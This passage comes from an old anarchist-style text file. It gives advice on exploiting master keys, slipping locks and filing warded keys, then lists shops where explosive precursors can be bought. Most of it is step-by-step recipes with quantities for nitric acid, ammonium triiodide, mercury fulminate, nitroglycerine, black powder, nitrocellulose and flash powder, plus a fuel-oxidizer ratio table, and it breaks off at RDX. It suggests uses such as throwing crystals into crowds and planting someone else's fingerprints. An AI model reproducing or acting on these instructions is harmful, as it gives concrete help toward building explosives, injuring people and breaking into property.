     *like* to help people.  Don't make them suspicious or annoy them.  If you
     do run into security people, try to make sure that there won't be any
     theft or break-ins reported there the next day...
 11) Consider the possibilities of master keys.  Often, every lock in a
     building or department will have a common master (building entrance keys
     are a common exception).  Take apart some locks from different places
     that should have common masters, measure the different pin lengths in
     each, and find lengths in common.  Experiment.  Then get into those
     places you're *really* curious about.
 12) Control keys are fun, too.  These keys allow the user to remove the
     lock's core, and are generally masters.  (A pair of needle nose pliers or
     similar tool can then be used to open the lock, if desired.)


2.11.1  SLIPPING A LOCK

     The best material we've found for slips so far is soft sheet copper.  It
is quite flexible, so it can be worked into jambs easily, and can be pre-bent
as needed.  In the plane of the sheet, however, it is fairly strong, and pulls
nicely.  Of course, if they're flexible enough, credit cards, student IDs,
etc., work just fine on locks that have been made slippable if the door jamb
is wide enough.  Wonderfully subtle, quick, and delightfully effective.  Don't
leave home without one.

 (Ill. 2.11.1 #1)

The sheet should then be folded to produce an L,J,or U shaped device that
looks like this:
                 ________________________________________
                /________________________________________|                       
               | |
               | |          L-shaped
               | |
               | |
               |_|

(Ill. 2.11.1 #2)
                       _____________________________
                      / ___________________________|
                     | |
                     | |     J-shaped
                     | |
                     | |________
                      \________|

(Ill. 2.11.1 #3)
                       _____________________
                      / ___________________|
                     | |
                     | |
                     | |     U-shaped
                     | |
                     | |____________________
                      \____________________|


We hasten to add here that many or most colleges and universities
have very strict policies about unauthorized possession of keys.  At
most, it is at least grounds for expulsion, even without filing criminal
charges.  Don't get caught with keys!!!  The homemade ones are
particularly obvious, as they don't have the usual stamps and marks
that the locksmiths put on to name and number the keys.]

we should also point out that if you make a nuisance of yourself, there are
various nasty things that can be done to catch you and/or slow you down.  For
instance, by putting special pin mechanisms in, locks can be made to trap any
key used to open them.  If you lose one this way, what can I say?  At least
don't leave fingerprints on it.  Or make sure they're someone else's.  Too
much mischief can also tempt the powers that be to rekey.


2.11.2       OPENING MASTER "WARDED" LOCKS   (by Vlad Tepes)

These are the lock with the keys that look like this:

(Ill. 2.11.2 #1)

   _                                                       _
  / \_[]_[]__[]_[]    A cross section looks like this:  \_/ \
  \_/ [] []  [] []

Just file the key down so it looks like this:

(Ill. 2.11.2 #2)
   _                                                      _
  / \___________[]    A cross section looks like this:  ~~~~~
  \_/           []

Now you can bypass the wards... sometimes you have to pull the key up and
down, turning as you pass each block, to find the internal lever that will
release the latch. It's possible that some of the newer locks have more than
one lever, which makes the process much more difficult.


2.2      LIST OF USEFUL HOUSEHOLD CHEMICALS AND THEIR AVAILABILITY

     Anyone can get many chemicals from hardware stores, supermarkets, and
drug stores to get the materials to make explosives or other dangerous
compounds.  A would-be terrorist would merely need a station wagon and some
money to acquire many of the chemicals named here.

Chemical                Used In                         Available at
________                _______                         ____________

alcohol, ethyl *       alcoholic beverages            liquor stores
                       solvents (95% min. for both)   hardware stores

ammonia +              CLEAR household ammonia        supermarkets/7-eleven

ammonium               instant-cold paks,             drug stores,
nitrate                fertilizers                    medical supply stores

nitrous oxide          pressurizing whip cream        party supply stores
                       poppers (like CO2 ctgs.)       Head shops (The Alley at
                                                      Belmont/Clark, Chgo)

magnesium              firestarters                   surplus/camping stores

lecithin               vitamins                       pharmacies/drug stores

mineral oil            cooking, laxative              supermarket/drug stores

mercury                mercury thermometers           supermarkets,
                                                      hardware stores

sulfuric acid          uncharged car batteries        automotive stores

glycerine                                             pharmacies/drug stores

sulfur                 gardening                      gardening/hardware store

charcoal               charcoal grills                supermarkets
                                                      gardening stores

sodium nitrate         fertilizer                     gardening store

cellulose (cotton)     first aid                      drug
                                                      medical supply stores

strontium nitrate      road flares                    surplus/auto stores,

fuel oil               kerosene stoves                surplus/camping stores,

bottled gas            propane stoves                 surplus/camping stores,

potassium permanganate water purification             purification plants

hexamine or            hexamine stoves                surplus/camping stores
methenamine            (camping)

nitric acid ^          cleaning printing              printing shops             
                       plates                         photography stores

Iodine                 disinfectant (tinture)         Pharmacy, OSCO

sodium perchlorate     solidox pellets                hardware stores
                       (VERY impure)                  for cutting torches


     ^ Nitric acid is very difficult to find nowadays.  It is usually stolen
by bomb makers, or made by the process described in a later section.  A
desired concentration for making explosives about 70%.

     & The iodine sold in drug stores is usually not the pure crystaline form
that is desired for producing ammonium triiodide crystals. To obtain the pure
form, it must usually be acquired by a doctor's prescription, but this can be
expensive.  Once again, theft is the means that terrorists result to.


2.3      PREPARATION OF CHEMICALS

        While many chemicals are not easily available in their pure form, it
is sometimes possible for the home chemist to purify more easily available
sources of impure forms of desired chemicals.


2.31     NITRIC ACID

       There are several ways to make this most essential of all acids for  
explosives. One method by which it could be made will be presented. Once  
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!

     Materials:                             Equipment:
     ÄÄÄÄÄÄÄÄÄ                              ÄÄÄÄÄÄÄÄÄ
     sodium nitrate or                      adjustable heat source     
     potassium nitrate
                                            retort
     distilled water
                                            ice bath
     concentrated
     sulfuric acid                          stirring rod

                                            collecting flask with stopper

1) Pour 32 milliliters of concentrated sulfuric acid into the retort.

2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of potassium
nitrate. and add this to the acid slowly.  If it all does not dissolve,
carefully stir the solution with a glass rod until it does.

3) Place the open end of the retort into the collecting flask, and place the   
collecting flask in the ice bath.

4) Begin heating the retort, using low heat.  Continue heating until liquid
begins to come out of the end of the retort.  The liquid that forms is nitric
acid.  Heat until the precipitate in the bottom of the retort is almost dry,
or until no more nitric acid is forming.  CAUTION: If the acid is headed too
strongly, the nitric acid will decompose as soon as it is formed.  This can
result in the production of highly flammable and toxic gasses that may
explode.  It is a good idea to set the above apparatus up, and then get away
from it.

     Potassium nitrate could also be obtained from store-bought black powder,
simply by dissolving black powder in boiling water and filtering out the sulfur
and charcoal. To obtain 68 g of potassium nitrate, it would be necessary to
dissolve about 90 g of black powder in about one litre of boiling water. Filter
the dissolved solution through filter paper in a funnel into a jar until the
liquid that pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to evaporate,
potassium nitrate will be left in the jar.

2.32     SULFURIC ACID

     Sulfuric acid is far too difficult to make outside of a laboratory or
industrial plant.  However, it is readily available in an uncharged car
battery. A person wishing to make sulfuric acid would simply remove the top of
a car battery and pour the acid into a glass container.  There would probably
be pieces of lead from the battery in the acid which would have to be removed,
either by boiling or filtration.  The concentration of the sulfuric acid can
also be increased by boiling it; very pure sulfuric acid pours slightly faster
than clean motor oil.


2.33     AMMONIUM NITRATE

     Ammonium nitrate is a very powerful but insensitive high-order explosive.
It could be made very easily by pouring nitric acid into a large flask in an ice
bath. Then, by simply pouring household ammonia into the flask and running away,
ammonium nitrate would be formed. After the materials have stopped reacting, one
would simply have to leave the solution in a warm place until all of the water
and any unneutralized ammonia or acid have evaporated. There would be a fine
powder formed, which would be ammonium nitrate. It must be kept in an airtight
container, because of its tendency to pick up water from the air.  The crystals
formed in the above process would have to be heated VERY gently to drive off the
remaining water.


3.0     EXPLOSIVE RECIPES

     Once again, persons reading this material MUST NEVER ATTEMPT TO PRODUCE
ANY OF THE EXPLOSIVES DESCRIBED HEREIN.  IT IS ILLEGAL AND EXTREMELY DANGEROUS
TO ATTEMPT TO DO SO.  LOSS OF LIFE AND/OR LIMB COULD EASILY OCCUR AS A RESULT
OF ATTEMPTING TO PRODUCE EXPLOSIVE MATERIALS.

     These recipes are theoretically correct, meaning that an individual could
conceivably produce the materials described.  The methods here are usually
scaled-down industrial procedures.

3.01     EXPLOSIVE THEORY

     An explosive is any material that, when ignited by heat or shock,
undergoes rapid decomposition or oxidation.  This process releases energy that
is stored in the material in the form of heat and light, or by breaking down
into gaseous compounds that occupy a much larger volume that the original
piece of material. Because this expansion is very rapid, large volumes of air
are displaced by the expanding gasses.  This expansion occurs at a speed
greater than the speed of sound, and so a sonic boom occurs.  This explains
the mechanics behind an explosion.  Explosives occur in several forms:
high-order explosives which detonate, low order explosives, which burn, and
primers, which may do both.

     High order explosives detonate.  A detonation occurs only in a high order
explosive.  Detonations are usually incurred by a shockwave that passes
through a block of the high explosive material.  The shockwave breaks apart
the molecular bonds between the atoms of the substance, at a rate
approximately equal to the speed of sound traveling through that material.  In
a high explosive, the fuel and oxodizer are chemically bonded, and the
shockwave breaks apart these bonds, and re-combines the two materials to
produce mostly gasses. T.N.T., ammonium nitrate, and R.D.X. are examples of
high order explosives.

     Low order explosives do not detonate; they burn, or undergo oxidation.
when heated, the fuel(s) and oxodizer(s) combine to produce heat, light, and
gaseous products.  Some low order materials burn at about the same speed under
pressure as they do in the open, such as blackpowder. Others, such as
gunpowder, which is correctly called nitrocellulose, burn much faster and
hotter when they are in a confined space, such as the barrel of a firearm;
they usually burn much slower than blackpowder when they are ignited in
unpressurized conditions. Black powder, nitrocellulose, and flash powder are
good examples of low order explosives.

     Primers are peculiarities to the explosive field.  Some of them, such as
mercury fulminate, will function as a low or high order explosive.  They are
usually more sensitive to friction, heat, or shock, than the high or low
explosives.  Most primers perform like a high order explosive, except that
they are much more sensitive.  Still others merely burn, but when they are
confined, they burn at a great rate and with a large expansion of gasses and a
shockwave. Primers are usually used in a small amount to initiate, or cause to
decompose, a high order explosive, as in an artillery shell.  But, they are
also frequently used to ignite a low order explosive;  the gunpowder in a
bullet is ignited by the detonation of its primer.

3.1     IMPACT EXPLOSIVES

     Impact explosives are often used as primers.  Of the ones discussed here,
only mercury fulminate and nitroglycerine are real explosives; Ammonium
triiodide crystals decompose upon impact, but they release little heat and no
light.  Impact explosives are always treated with the greatest care, and even
the stupidest anarchist never stores them near any high or low explosives.


3.11    AMMONIUM TRIIODIDE CRYSTALS

     Ammonium triiodide crystals are foul-smelling purple colored crystals
that decompose under the slightest amount of heat, friction, or shock, if they
are made with the purest ammonia (ammonium hydroxide) and iodine.  Such
crystals are said to detonate when a fly lands on them, or when an ant walks
across them. Household ammonia, however, has enough impurities, such as soaps
and abrasive agents, so that the crystals will detonate when thrown,crushed,
or heated. Ammonia, when bought in stores comes in a variety of forms.  The
pine and cloudy ammonias should not be bought; only the clear ammonia should
be used to make ammonium triiodide crystals. Upon detonation, a loud report is
heard, and a cloud of purple iodine gas appears about the detonation site.
Whatever the unfortunate surface that the crystal was detonated upon will
usually be ruined, as some of the iodine in the crystal is thrown about in a
solid form, and iodine is corrosive.  It leaves nasty, ugly, permanent
brownish-purple stains on whatever it contacts. Iodine gas is also bad news,
since it can damage lungs, and it settles to the ground and stains things
there also.  Touching iodine leaves brown stains on the skin that last for
about a week, unless they are immediately and vigorously washed off.  While
such a compound would have little use to a serious terrorist, a vandal could
utilize them in damaging property.  Or, a terrorist could throw several of
them into a crowd as a distraction, an action which would possibly injure a
few people, but frighten almost anyone, since a small crystal that may not be
seen when thrown produces a rather loud explosion.

    Ammonium triiodide crystals could be produced in the following manner:

     Materials                Equipment
     ÄÄÄÄÄÄÄÄÄ                ÄÄÄÄÄÄÄÄÄ
     iodine crystals          funnel and filter paper
                              paper towels
     clear ammonia
     (ammonium hydroxide,     two throw-away glass jars
      for the suicidal)

1) Place about two teaspoons of iodine into one of the glass jars.  The jars
   must both be throw away because they will never be clean again.

2) Add enough ammonia to completely cover the iodine.

3) Place the funnel into the other jar, and put the filter paper in the
   funnel. The technique for putting filter paper in a funnel is taught in
   every basic chemistry lab class: fold the circular paper in half, so that a
   semi-circle is formed.  Then, fold it in half again to form a triangle with
   one curved side.  Pull one thickness of paper out to form a cone, and place
   the cone into the funnel.

4) After allowing the iodine to soak in the ammonia for a while, pour the
   solution into the paper in the funnel through the filter paper.

5) While the solution is being filtered, put more ammonia into the first jar
   to wash any remaining crystals into the funnel as soon as it drains.

6) Collect all the purplish crystals without touching the brown filter paper,
   and place them on the paper towels to dry for about an hour.  Make sure
   that they are not too close to any lights or other sources of heat, as they
   could well detonate. While they are still wet, divide the wet material into
   eight pieces of about the same size.

7) After they dry, gently place the crystals onto a one square inch piece of
   duct tape.  Cover it with a similar piece, and gently press the duct tape
   together around the crystal, making sure not to press the crystal itself.
   Finally, cut away most of the excess duct tape with a pair of scissors, and
   store the crystals in a cool dry safe place.  They have a shelf life of
   about a week, and they should be stored in individual containers that can
   be thrown away, since they have a tendency to slowly decompose, a process
   which  gives off iodine vapors, which will stain whatever they settle on.
   One possible way to increase their shelf life is to store them in airtight
   containers.  To use them, simply throw them against any surface or place
   them where they will be stepped on or crushed.


3.12      MERCURY FULMINATE

     Mercury fulminate is perhaps one of the oldest known initiating
compounds. It can be detonated by either heat or shock, which would make it of
infinite value to a terrorist.  Even the action of dropping a crystal of the
fulminate causes it to explode.  A person making this material would probably
use the following procedure:

     MATERIALS                  EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                  ÄÄÄÄÄÄÄÄÄ
     5 g mercury               glass stirring rod

     35 ml concentrated         100 ml beaker (2)
     nitric acid

     ethyl alcohol (30 ml)      adjustable heat source

     distilled water            blue litmus paper

                                funnel and filter paper

     Solvent alcohol must be at least 95% ethyl alcohol if it is used to make
mercury fulminate. Methyl alcohol may prevent mercury fulminate from forming.

     Mercury thermometers are becoming a rarity, unfortunately.  They may be
hard to find in most stores as they have been superseded by alcohol and other
less toxic fillings. Mercury is also used in mercury switches, which are
available at electronics stores. Mercury is a hazardous substance, and should
be kept in the thermometer or mercury switch until used. It gives off mercury
vapors which will cause brain damage if inhaled.  For this reason, it is a
good idea not to spill mercury, and to always use it outdoors. Also, do not
get it in an open cut; rubber gloves will help prevent this.

1) In one beaker, mix 5 g of mercury with 35 ml of concentrated nitric acid,
   using the glass rod.

2) Slowly heat the mixture until the mercury is dissolved, which is when the
   solution turns green and boils.

3) Place 30 ml of ethyl alcohol into the second beaker, and slowly and
   carefully add all of the contents of the first beaker to it.  Red and/or
   brown fumes should appear. These fumes are toxic and flammable.

4) After thirty to forty minutes, the fumes should turn white, indicating that
   the reaction is near completion.  After ten more minutes, add 30 ml of the
   distilled water to the solution.

5) Carefully filter out the crystals of mercury fulminate from the liquid
   solution.  Dispose of the solution in a safe place, as it is corrosive and
   toxic.

6) Wash the crystals several times in distilled water to remove as much excess
   acid as possible.  Test the crystals with the litmus paper until they are
   neutral.   This will be when the litmus paper stays blue when it touches
   the wet crystals

7) Allow the crystals to dry, and store them in a safe place, far away from
   any explosive or flammable material.

       This procedure can also be done by volume, if the available mercury
cannot be weighed.  Simply use 10 volumes of nitric acid and 10 volumes of
ethanol to every one volume of mercury.


3.13       NITROGLYCERINE

     Nitroglycerine is one of the most sensitive explosives, if it is not the
most sensitive.  Although it is possible to make it safely, it is difficult.
Many a young anarchist has been killed or seriously injured while trying to
make the stuff.  When Nobel's factories make it, many people were killed by
the all-to-frequent factory explosions.  Usually, as soon as it is made, it is
converted into a safer substance, such as dynamite.  An idiot who attempts to
make nitroglycerine would use the following procedure:

     MATERIAL               EQUIPMENT
     ÄÄÄÄÄÄÄÄ               ÄÄÄÄÄÄÄÄÄ
     distilled water        eye-dropper

     table salt             100 ml beaker

     sodium bicarbonate     200-300 ml beakers (2)

     concentrated nitric    ice bath container
     acid (13 ml)           ( a plastic bucket serves well )

     concentrated sulfuric  centigrade thermometer
     acid (39 ml)

     glycerine              blue litmus paper


1)  Place 150 ml of distilled water into one of the 200-300 ml beakers.

2)  In the other 200-300 ml beaker, place 150 ml of distilled water and about
   a spoonful of sodium bicarbonate, and stir them until the sodium
   bicarbonate dissolves.  Do not put so much sodium bicarbonate in the water
   so that some remains undissolved.

3)  Create an ice bath by half filling the ice bath container with ice, and
   adding table salt.  This will cause the ice to melt, lowering the overall
   temperature.

4)  Place the 100 ml beaker into the ice bath, and pour the 13 ml of
   concentrated nitric acid into the 100 ml beaker.  Be sure that the beaker
   will not spill into the ice bath, and that the ice bath will not overflow
   into the beaker when more materials are added to it.  Be sure to have a
   large enough ice bath container to add more ice.  Bring the temperature of
   the acid down to about 20 degrees centigrade or less.

5)  When the nitric acid is as cold as stated above, slowly and carefully add
   the 39 ml of concentrated sulfuric acid to the nitric acid.  Mix the two
   acids together, and cool the mixed acids to 10 degrees centigrade.  It is a
   good idea to start another ice bath to do this.

6)  With the eyedropper, slowly put the glycerine into the mixed acids, one
   drop at a time.  Hold the thermometer along the top of the mixture where
   the mixed acids and glycerine meet.

      DO NOT ALLOW THE TEMPERATURE TO GET ABOVE 30 DEGREES CENTIGRADE; IF
        THE TEMPERATURE RISES ABOVE THIS TEMPERATURE, WATCH OUT !!

   The glycerine will start to nitrate immediately, and the temperature will
immediately begin to rise.  Add glycerine until there is a thin layer of
glycerine on top of the mixed acids.  It is always safest to make any
explosive in small quantities.

7)  Stir the mixed acids and glycerine for the first ten minutes of nitration,
   adding ice and salt to the ice bath to keep the temperature of the solution
   in the 100 ml beaker well below 30 degrees centigrade.  Usually, the
   nitroglycerine will form on the top of the mixed acid solution, and the
   concentrated sulfuric acid will absorb the water produced by the reaction.

8)  When the reaction is over, and when the nitroglycerine is well below 30
   degrees centigrade, slowly and carefully pour the solution of
   nitroglycerine and mixed acid into the distilled water in the beaker in
   step 1.  The nitroglycerine should settle to the bottom of the beaker, and
   the water-acid solution on top can be poured off and disposed of. Drain as
   much of the acid- water solution as possible without disturbing the
   nitroglycerine.

9)  Carefully remove the nitroglycerine with a clean eye-dropper, and place it
   into the beaker in step 2.  The sodium bicarbonate solution will eliminate
   much of the acid, which will make the nitroglycerine more stable, and less
   likely to explode for no reason, which it can do.  Test the nitroglycerine
   with the litmus paper until the litmus stays blue.  Repeat this step if
   necessary, and use new sodium bicarbonate solutions as in step 2.

10) When the nitroglycerine is as acid-free as possible, store it in a clean
   container in a safe place.  The best place to store nitroglycerine is far
   away from anything living, or from anything of any value. Nitroglycerine
   can explode for no apparent reason, even if it is stored in a secure cool
   place.


3.14     PICRATES

     Although the procedure for the production of picric acid, or
trinitrophenol has not yet been given, its salts are described first, since
they are extremely sensitive, and detonate on impact.  By mixing picric acid
with metal hydroxides, such as sodium or potassium hydroxide, and evaporating
the water, metal picrates can be formed.  Simply obtain picric acid, or
produce it, and mix it with a solution of (preferably) potassium hydroxide, of
a mid range molarity.  (about 6-9 M)  This material, potassium picrate, is
impact-sensitive, and can be used as an initiator for any type of high
explosive.

3.2      LOW-ORDER EXPLOSIVES

     There are many low-order explosives that can be purchased in gun stores
and used in explosive devices. However, it is possible that a wise wise store
owner would not sell these substances to a suspicious-looking individual. Such
an individual would then be forced to resort to making his own low-order
explosives.

3.21     BLACK POWDER

     First made by the Chinese for use in fireworks, black powder was first
used in weapons and explosives in the 12th century.  It is very simple to
make, but it is not very powerful or safe.  Only about 50% of black powder is
converted to hot gasses when it is burned; the other half is mostly very fine
burned particles.  Black powder has one major problem: it can be ignited by
static electricity.  This is very bad, and it means that the material must be
made with wooden or clay tools.  Anyway, a misguided individual could
manufacture black powder at home with the following procedure:

     MATERIALS               EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ               ÄÄÄÄÄÄÄÄÄ
     potassium               clay grinding bowl
     nitrate (75 g)          and clay grinder

       or                         or

     sodium                  wooden salad bowl
     nitrate (75 g)          and wooden spoon

     sulfur (10 g)           plastic bags (3)

     charcoal (15 g)         300-500 ml beaker (1)

     distilled water         coffee pot or heat source



1) Place a small amount of the potassium or sodium nitrate in the grinding
 bowl and grind it to a very fine powder.  Do this to all of the potassium or
 sodium nitrate, and store the ground powder in one of the plastic bags.

2) Do the same thing to the sulfur and charcoal, storing each chemical in a
separate plastic bag.

3) Place all of the finely ground potassium or sodium nitrate in the beaker,
   and add just enough boiling water to the chemical to get it all wet.

4) Add the contents of the other plastic bags to the wet potassium or sodium
nitrate, and mix them well for several minutes.  Do this until there is no
more visible sulfur or charcoal, or until the mixture is universally black.

5) On a warm sunny day, put the beaker outside in the direct sunlight.
  Sunlight is really the best way to dry black powder, since it is never too
  hot, but it is hot enough to evaporate the water.

6) Scrape the black powder out of the beaker, and store it in a safe
 container. Plastic is really the safest container, followed by paper.  Never
 store black powder in a plastic bag, since plastic bags are prone to generate
 static electricity.


3.22     NITROCELLULOSE

     Nitrocellulose is usually called "gunpowder" or "guncotton".  It is more
stable than black powder, and it produces a much greater volume of hot gas.  It
also burns much faster than black powder when it is in a confined space.
Finally, nitrocellulose is fairly easy to make, as outlined by the following
procedure:


     MATERIALS                    EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                    ÄÄÄÄÄÄÄÄÄ
     cotton  (cellulose)          two (2) 200-300 ml beakers

     concentrated                 funnel and filter paper
     nitric acid
                                  blue litmus paper
     concentrated
     sulfuric acid

     distilled water



1) Pour 10 cc of concentrated sulfuric acid into the beaker.  Add to this    10
cc of concentrated nitric acid.

2) Immediately add 0.5 gm of cotton, and allow it to soak for exactly 3   
minutes.

3) Remove the nitrocotton, and transfer it to a beaker of distilled water    to
wash it in.

4) Allow the material to dry, and then re-wash it.

5) After the cotton is neutral when tested with litmus paper, it is ready to   
be dried and stored.

3.22.1     PRODUCING CELLULOSE NITRATE   (From andrew at CMU)

 I used to make nitrocellulose, though. It was not guncotton grade, because I
didn't have oleum (H2SO4 with dissolved SO3); nevertheless it worked. At first
I got my H2SO4 from a little shop in downtown Philadelphia, which sold
soda-acid fire extinguisher refills. Not only was the acid concentrated, cheap
and plentiful, it came with enough carbonate to clean up. I'd add KNO3 and a
little water (OK, I'd add the acid to the water - but there was so little
water, what was added to what made little difference. It spattered
concentrated H2SO4 either way). Later on, when I could purchase the acids, I
believe I used 3 parts H2SO4 to 1 part HNO3. For cotton, I'd use cotton wool
or cotton cloth.

 Runaway nitration was commonplace, but it is usually not so disasterous with
nitrocellulose as it is with nitroglycerine. For some reason, I tried washing
the cotton cloth in a solution of lye, and rinsing it well in distilled water.
I let the cloth dry and then nitrated it. (Did I read this somewhere?) When
that product was nitrated, I never got a runaway reaction. BTW, water quenched
the runaway reaction of cellulose.

The product was washed thoroughly and allowed to dry. It dissolved (or turned
into mush) in acetone. It dissolved in alcohol/ether.

                                   WARNINGS

 All usual warnings regarding strong acids apply. H2SO4 likes to spatter. When
it falls on the skin, it destroys tissue - often painfully. It dissolves all
manner of clothing. Nitric also destroys skin, turning it bright yellow in the
process. Nitric is an oxidant - it can start fires. Both agents will happily
blind you if you get them in your eyes. Other warnings also apply. Not for the
novice.

 Nitrocellulose decomposes very slowly on storage if it isn't stablized. The
decomposition is auto- catalyzing, and can result in spontaneous explosion if
the material is kept confined over time. The process is much faster if the
material is not washed well enough. Nitrocellulose powders contain stabilizers
such as diphenyl amine or ethyl centralite. DO NOT ALLOW THESE TO COME INTO
CONTACT WITH NITRIC ACID!!!! A small amount of either substance will capture
the small amounts of nitrogen oxides that result from decomposition. They
therefore inhibit the autocatalysis. NC eventually will decompose in any case.

Again, this is inherently dangerous and illegal in certain areas. I got away
with it. You may kill yourself and others if you try it.

3.22.2      Commercially produced Nitrocellulose is stabilized by:

1. Spinning it in a large centrifuge to remove the remaining acid, which is
   recycled.

2. Immersion in a large quantity of fresh water.

3. Boiling it in acidulated water and washing it thoroughly with fresh water.

   If the NC is to be used as smokeless powder it is boiled in a soda solution,
then rinsed in fresh water.

   The purer the acid used (lower water content) the more complete the
nitration will be, and the more powerful the nitrocellulose produced.

   There are actually three forms of cellulose nitrate, only one of which is
useful for pyrotechnic purposes. The mononitrate and dinitrate are not
explosive, and are produced by incomplete nitration. If nitration is allowed
to proceed to complete the explosive trinatrate is formed.

(Ill. 3.22.2)


     CH OH                           CH ONO
     | 2                             | 2   2
     |                               |
     C-----O         HNO             C-----O
    /H      \           3           /H      \
 -CH         CH-O-         -->   -CH         CH-O-
    \H     H/        H SO           \H     H/
     C-----C          2  4           C-----C
     |     |                         |     |
     OH    OH                        ONO   ONO
                                        2     2

     CELLULOSE                   CELLULOSE TRINITRATE


3.23     FUEL-OXODIZER MIXTURES

     There are nearly an infinite number of fuel-oxodizer mixtures that can be
produced by a misguided individual in his own home.  Some are very effective
and dangerous, while others are safer and less effective.  A list of working
fuel- oxodizer mixtures will be presented, but the exact measurements of each
compound are debatable for maximum effectiveness.  A rough estimate will be
given of the percentages of each fuel and oxodizer:

oxodizer, % by weight         fuel, % by weight    speed #     notes
================================================================================ 
potassium chlorate 67%          sulfur 33%            5   friction/impact        
                                                          sensitive; unstable

potassium chlorate 50%          sugar 35%             5   fairly slow burning;   
                                charcoal 15%              unstable

potassium chlorate 50%          sulfur 25%            8      extremely           
                                magnesium or                 unstable!
                                aluminum dust 25%

potassium chlorate 67%          magnesium or          8          unstable        
                               aluminum dust 33%

sodium nitrate 65%            magnesium dust 30%      ?        unpredictable     
                              sulfur 5%                         burn rate

potassium permanganate 60%     glycerine 40%          4     delay before         
                                                          ignition depends
WARNING: IGNITES SPONTANEOUSLY WITH GLYCERINE!!!          upon grain size

potassium permanganate 67%     sulfur 33%             5       unstable

potassium permangenate 60%     sulfur 20%             5       unstable           
                               magnesium or
                               aluminum dust 20%

potassium permanganate 50%     sugar 50%              3          ?

potassium nitrate 75%         charcoal 15%            7      this is             
                              sulfur 10%                    black powder!

potassium nitrate 60%         powdered iron           1     burns very hot       
                              or magnesium 40%


 Oxidizer, % by weight         fuel, % by weight    speed #     notes
================================================================================ 
potassium chlorate 75%        phosphorus              8  used to make strike-    
                         sesquisulfide 25%            anywhere matches

ammonium perchlorate 70%     aluminum dust 30%        6     solid fuel for       
                           and small amount of               space shuttle
                           iron oxide

potassium perchlorate 67%     magnesium or           10      flash powder
(sodium perchlorate)          aluminum dust 33%

potassium perchlorate 60%    magnesium or             8      alternate
(sodium perchlorate)         aluminum dust 20%               flash powder
                             sulfur 20%

barium nitrate 30%           aluminum dust 30%        9       alternate 
potassium perchlorate 30%                                    flash powder

barium peroxide 90%          magnesium dust 5%       10       alternate          
                             aluminum dust 5%                flash powder

potassium perchlorate 50%     sulfur 25%              8       slightly           
                              magnesium or                    unstable
                              aluminum dust 25%

potassium chlorate 67%        red phosphorus 27%      7     very unstable 
calcium carbonate 3%          sulfur 3%                     impact sensitive

potassium permanganate 50%    powdered sugar 25%      7       unstable;          
                              aluminum or                     ignites if
                              magnesium dust 25%              it gets wet!

potassium chlorate 75%        charcoal dust 15%       6        unstable          
                              sulfur 10%
================================================================================

NOTE: Mixtures that uses substitutions of sodium perchlorate for potassium      
perchlorate become moisture-absorbent and less stable.

     The higher the speed number, the faster the fuel-oxodizer mixture burns
AFTER ignition.  Also, as a rule, the finer the powder, the faster the rate of
burning.

     As one can easily see, there is a wide variety of fuel-oxodizer mixtures
that can be made at home.  By altering the amounts of fuel and oxodizer(s),
different burn rates can be achieved, but this also can change the sensitivity
of the mixture.

3.24    PERCHLORATES

     As a rule, any oxidizable material that is treated with perchloric acid
will become a low order explosive.  Metals, however, such as potassium or
sodium, become excellent bases for flash-type powders.  Some materials that
can be perchlorated are cotton, paper, and sawdust.  To produce potassium or
sodium perchlorate, simply acquire the hydroxide of that metal, e.g. sodium or
potassium hydroxide.  It is a good idea to test the material to be treated
with a very small amount of acid, since some of the materials tend to react
explosively when contacted by the acid.  Solutions of sodium or potassium
hydroxide are ideal.

3.25  FLASH POWDER      (By Dr. Tiel)

Here are a few basic precautions to take if you're crazy enough to produce
your own flash powder:

(1) Grind the oxidizer (KNO3, KClO3, KMnO4, KClO4 etc) separately in a
     clean vessel.

(2) NEVER grind or sift the mixed composition.

(3) Mix the composition on a large paper sheet, by rolling the composition
    back and forth.

(4) Do not store flash compositions, especially any containing Mg.

(5) Make very small quantities at first, so you can appreciate the power
    of such mixtures.

        KNO3  50%     (by weight)
        Mg    50%

   It is very important to have the KNO3 very dry, if evolution of ammonia is
observed then the KNO3 has water in it.  Very pure and dry KNO3 is needed.

   KClO3 with Mg or Al metal powders works very well.  Many hands, faces and
lives have been lost with such compositions.

KMnO4 with Mg or Al is also an extremely powerful flash composition.

KClO4 with Al is generally found in comercial fireworks, this does not
mean that it is safe, it is a little safer than KClO3 above.

K2Cr2O7 can also be used as an oxidizer for flash powder.

The finer the oxidizer and the finer the metal powder the more powerful the
explosive.  This of course will also increase the sensetivity of the flash
powder.

For a quick flash small quantities can be burnt in the open.
Larger quantities (50g or more)  ignited in the open can detonate, they do not
need a container to do so.

NOTE:   Flash powder in any container will detonate.

Balanced equations of some oxidizer/metal reactions. Only major products
are considered.  Excess metal powders are generally used.  This excess
burns with atmospheric oxygen.

4 KNO3 + 10 Mg  -->  2 K2O + 2 N2 + 10 MgO + energy

KClO3 + 2 Al  -->  KCl + Al2O3 + energy

3 KClO4 + 8 Al  -->  3 KCl + 4 Al2O3 + energy

6 KMnO4 + 14 Al  -->  3 K2O + 7 Al2O3 + 6 Mn + energy

Make Black Powder first if you have never worked with pyrotechnic 
materials, then think about this stuff.

                                Dr. Van Tiel-   Ph.D. Chemistry


Potassium perchlorate is a lot safer than sodium/potassium chlorate.

3.3     HIGH-ORDER EXPLOSIVES

     High order explosives can be made in the home without too much
difficulty. The main problem is acquiring the nitric acid to produce the high
explosive. Most high explosives detonate because their molecular structure is
made up of some fuel and usually three or more NO2 ( nitrogen dioxide )
molecules.  T.N.T., or Tri-Nitro-Toluene is an excellent example of such a
material.  When a shock wave passes through an molecule of T.N.T., the
nitrogen dioxide bond is broken, and the oxygen combines with the fuel, all in
a matter of microseconds.  This accounts for the great power of nitrogen-based
explosives.  Remembering that these procedures are NEVER TO BE CARRIED OUT,
several methods of manufacturing high-order explosives in the home are listed.

3.31     R.D.X.

     R.D.X., also called cyclonite, or composition C-1 (when mixed with
plasticisers) is one of the most valuable of all military explosives.  This is
because it has more than 150% of the power of T.N.T., and is much easier to
detonate.  It should not be used alone, since it can be set off by a not-too
severe shock.  It is less sensitive than mercury fulminate, or nitroglycerine,
but it is still too sensitive to be used alone.

(Ill. 3.31)              NO
                           2
                          |
                          N
                         / \             RDX MOLECULE
                        /   \
                       H C   H C
                      / 2     2
                     /        |
                   O N        N--NO
                    2 \      /     2
